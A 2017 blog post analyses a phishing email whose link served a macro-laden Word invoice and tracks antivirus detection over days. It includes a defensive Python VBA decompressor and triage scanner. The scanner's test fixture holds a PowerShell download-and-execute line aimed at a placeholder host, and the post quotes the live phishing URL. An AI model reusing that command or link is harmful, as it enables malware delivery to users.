25 Aug 2017 | Security | 2 min | 818

    #Security: Phishing with Macros! (updated)



    Hi!

Yesterday I received an email from an address that was meant to look like my boss's email address. It was something like this: "Boss.Name@our-institute.uni-hannover.de nancy@hillstar.brcoxmail.com", with the subject "Rech QK - 163-DA7666 Riva, Mauro" and a body saying:

Guten Tag, Riva, Mauro (Good day, Riva, Mauro)

Als Anhang erhalten Sie Ihre Rechnung. (something like "You receive your invoice as an attachment.")

Rech:
http://blackbox-es.com/Rechnung-26375407950/ (don't click this link --> read the whole post first!!!)

Herzliche Grüße (Best regards)

boss.name@our-institute.uni-hannover.de
    

    As you see, there is a link to the Blackbox-ES company website based in Kaysville, UT, USA.

You are obviously going to say phishing! That's for sure! But I clicked on the link to check it out, using the Tor Browser (I didn't want to give away my IP). The link started a download of a Word document named Rechnungs-Details-43154391936.doc, and again, obviously, with macros inside: a payload! I haven't opened it yet, but this weekend I am going to use the virtual machine that I usually use for that. I want to read the payload and, if possible, check the remote host address.
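A worked example of the static step planned above, reading the macro without running it. This is added code, not from the original post and not the author's: it implements the MS-OVBA decompression that Word applies to VBA module source, then triages the decompressed text for autostart entry points, the usual shell/download calls and any URLs (which is where a remote host address would show up). It assumes you have already pulled the compressed source out of the module stream (for a .doc that is the `Macros/VBA/<ModuleName>` stream inside the OLE2 container, starting at the offset recorded in the VBA `dir` stream; olefile or oletools' olevba does that part). The macro text, the literal-only encoder used to package it, the hand-built copy-token blob and the URL `http://example.invalid/dl/x.txt` are constructed fixtures, not anything taken from the actual sample.

```python
"""Static triage of a VBA macro module pulled from a malicious Office document.

Added example (not the post's own code). It takes the compressed source of one
VBA module stream, decompresses it per MS-OVBA 2.4.1 and flags what a phishing
macro typically contains, without ever executing anything.
"""
import math
import re


def decompress_vba(data: bytes) -> bytes:
    """Decompress an MS-OVBA CompressedContainer (signature 0x01, then chunks)."""
    if not data or data[0] != 0x01:
        raise ValueError("not a VBA compressed container: signature byte != 0x01")
    out = bytearray()
    pos = 1
    while pos < len(data):
        header = int.from_bytes(data[pos:pos + 2], "little")
        chunk_size = (header & 0x0FFF) + 3        # includes the 2-byte header
        compressed = (header >> 15) & 1
        chunk_end = min(len(data), pos + chunk_size)
        chunk = data[pos + 2:chunk_end]
        pos = chunk_end
        if not compressed:                        # raw chunk: bytes copied as-is
            out += chunk
            continue
        chunk_start = len(out)                    # copy offsets are chunk-relative
        i = 0
        while i < len(chunk):
            flags = chunk[i]                      # one flag bit per following token
            i += 1
            for bit in range(8):
                if i >= len(chunk):
                    break
                if not (flags >> bit) & 1:        # literal token: one raw byte
                    out.append(chunk[i])
                    i += 1
                    continue
                token = int.from_bytes(chunk[i:i + 2], "little")   # copy token
                i += 2
                # The offset/length split of the 16-bit token depends on how many
                # bytes of this chunk are already decompressed (MS-OVBA CopyToken help).
                done = max(len(out) - chunk_start, 1)
                bit_count = max(math.ceil(math.log2(done)), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                for _ in range(length):           # byte by byte: source may overlap
                    out.append(out[-offset])
    return bytes(out)


# Entry points Word/Excel run automatically, and calls that usually mean
# "drop and run something". Matched case-insensitively, as VBA itself is.
AUTOSTART = ("AutoOpen", "Auto_Open", "AutoExec", "AutoClose",
             "Document_Open", "Document_Close", "Workbook_Open")
SUSPICIOUS = ("Shell", "WScript.Shell", "CreateObject", "PowerShell", "cmd",
              "MSXML2.XMLHTTP", "ADODB.Stream", "URLDownloadToFile",
              "Environ", "Chr(", "StrReverse")
URL_RE = re.compile(rb"https?://[^\s\"']+", re.IGNORECASE)


def triage_vba(source: bytes) -> dict:
    """Report autostart triggers, suspicious calls and URLs found in macro source."""
    low = source.decode("latin-1").lower()
    return {
        "autostart": sorted(k for k in AUTOSTART if k.lower() in low),
        "suspicious": sorted(k for k in SUSPICIOUS if k.lower() in low),
        "urls": sorted({m.decode("latin-1") for m in URL_RE.findall(source)}),
    }


# --- constructed fixtures (not the real sample) -------------------------------
SAMPLE_MACRO = (
    b"Sub AutoOpen()\r\n"
    b"    Set o = CreateObject(\"WScript.Shell\")\r\n"
    b"    o.Run \"powershell -w hidden -c IEX((New-Object Net.WebClient)"
    b".DownloadString('http://example.invalid/dl/x.txt'))\"\r\n"
    b"End Sub\r\n"
)

# Hand-built container: 9 literals 'AutoOpen ' then one copy token
# (length 8, offset 9) that repeats them, so the copy path gets exercised.
COPY_TOKEN_SAMPLE = b"\x01\x0c\xb0\x00AutoOpen\x02 \x05\x80"


def compress_literal_only(plain: bytes) -> bytes:
    """Fixture helper: wrap <=4096 bytes in one chunk using literal tokens only."""
    body = bytearray()
    for i in range(0, len(plain), 8):
        body.append(0x00)                         # flag byte: eight literal tokens
        body += plain[i:i + 8]
    header = 0xB000 | (len(body) + 2 - 3)         # compressed, sig 0b011, size-3
    return b"\x01" + header.to_bytes(2, "little") + bytes(body)


if __name__ == "__main__":
    source = decompress_vba(compress_literal_only(SAMPLE_MACRO))
    print(source.decode("latin-1"))
    print(triage_vba(source))
    print(decompress_vba(COPY_TOKEN_SAMPLE))     # b'AutoOpen AutoOpen'
```

Feed `decompress_vba()` a slice of a real module stream to get the macro text back; the keyword lists are only a starting point. Heavily obfuscated macros assemble their strings with Chr(), StrReverse and concatenation (which is why those names are in the list), so an empty triage result never proves a document is safe, and the URL a macro contacts is often built at runtime rather than stored as a literal.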

I uploaded it to VirusTotal and the first time (yesterday at 10 a.m.) only 4 antivirus engines detected the file as a threat! Now I have uploaded it again and got the following report:

(Screenshot: VirusTotal report, file flagged as a macro virus)

Only 7 antivirus engines detect the file as a threat! I still have the file in my download folder and Microsoft Security Essentials is not reporting or deleting it!!! Nice! :S

I've done the following things:

I found the following report: https://goo.gl/yPakSa. It contains more information about the payload!

(I haven't checked the email address nancy@hillstar.brcoxmail.com yet, but it probably doesn't exist, and neither does the domain.)

    We will see tomorrow!

    Notes:

• (1) I've just received an email from Kaspersky Lab with the following content:
  Malicious code detected by Kaspersky Lab products with KSN technology enabled has been found in the following files:
  Rechnungs-Details-43154391936.doc - UDS:DangerousObject.Multi.Generic
• (2) Microsoft reports the following: (screenshot: Microsoft report)

    Updates:

25.08.2017 10:20: 11 antivirus engines detect it (Microsoft still reports the file as clean!) (screenshot: update 20170825 10:20)

Last update (03.09.2017 23:00): 31 antivirus engines detect it (Microsoft still reports the file as clean! I've submitted it twice, but no chance!) (screenshot: last update 20170903 23:00)

